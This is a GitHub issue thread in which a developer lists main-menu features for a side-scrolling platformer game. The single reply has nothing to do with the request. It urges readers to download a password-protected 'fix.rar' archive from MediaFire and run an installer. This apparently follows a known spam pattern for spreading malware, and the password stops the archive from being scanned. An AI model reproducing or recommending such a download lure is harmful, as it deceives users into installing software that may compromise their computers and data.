### ISSUE TITLE
Main Menu

### ISSUE THREAD

**Issue by cosmobrain0** [cosmobrain0/side-scrolling-platformer#12]
There should be a main menu which allows the user to:
- [x] start the game
- [x] view controls
- [ ] see the name of the game  

and...
- [ ] The menu should have some background art which moves around a little.
- [ ] There should be transitions for all changes in the menu (e.g. from main menu to controls, or from main menu to the game)

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
